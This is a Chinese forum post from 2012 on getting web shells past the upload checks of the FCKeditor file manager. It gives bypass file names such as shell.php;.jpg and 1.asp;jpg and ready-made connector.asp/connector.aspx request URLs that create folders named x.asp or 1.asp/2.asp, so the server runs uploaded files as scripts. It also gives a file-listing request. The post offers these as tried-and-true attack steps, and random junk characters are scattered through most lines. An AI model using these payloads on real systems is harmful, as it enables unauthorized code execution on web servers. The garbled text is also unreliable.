很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg& u% ?( v `! m5 b. r- J% n
& o" F3 N% q/ G* _4 F5 e& i5 M8 u提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
. P& v' M: ^. }8 s4 g& ~
2 P" d6 i) M# }7 @$ I. B, K继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
' W8 T, [$ Z; v2 D
5 u8 n$ `) p) M8 ]: f9 p o6 }( Q突破建立文件夹:
. Z$ [+ g( _) H$ @* B+ M3 I; N$ _3 f3 u
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp- j! e/ G5 w! N! t
; x% i8 c6 u+ @ N* h1 r0 K$ ?0 ?
参数:7 L3 N9 W6 ?4 D; Q
+ j$ `, W0 o7 O8 E/ G# W" N# P
当前目录名:CurrentFolder=/qing.asp
$ x& T: p4 N5 o8 ~! m
& k; |* ^+ d5 u* v3 C3 q! P( s! \新的目录名:NewFolderName=x.asp8 _5 ?1 {: o' E O9 o) N
+ j! _8 m8 f- \) I A) m. W9 ^* N其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
8 e1 j8 A2 F, a: J5 m2 _4 @3 G- W8 G! }1 f: ~7 s7 F0 P
那么 x.asp 就已经建立生成了,此方法百试百灵!
$ J3 H8 Z% q+ \3 W, P4 c6 L6 Q$ ^( g$ ]5 \$ p+ @( [
新建文件夹参数 x.asp,基本都能搞定。. F& m0 s; ^+ j2 a1 D, |
! W- b/ C% r9 I6 V* p下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
0 R, S$ O! v6 [; }0 m/ z7 d" c, z( y: R5 V. ]0 d/ B( j% \
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp0 d P; t! p7 V) J
$ Z" I/ T8 F7 R8 _+ f) a4 w获取文件列表- J- h% v1 o0 ^: K
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F, I7 L$ p% T% y; e' G8 i& h
, `/ Q- h% C6 a0 I; A# z
|
发表于 2012-12-31 09:27:09
收藏
支持
反对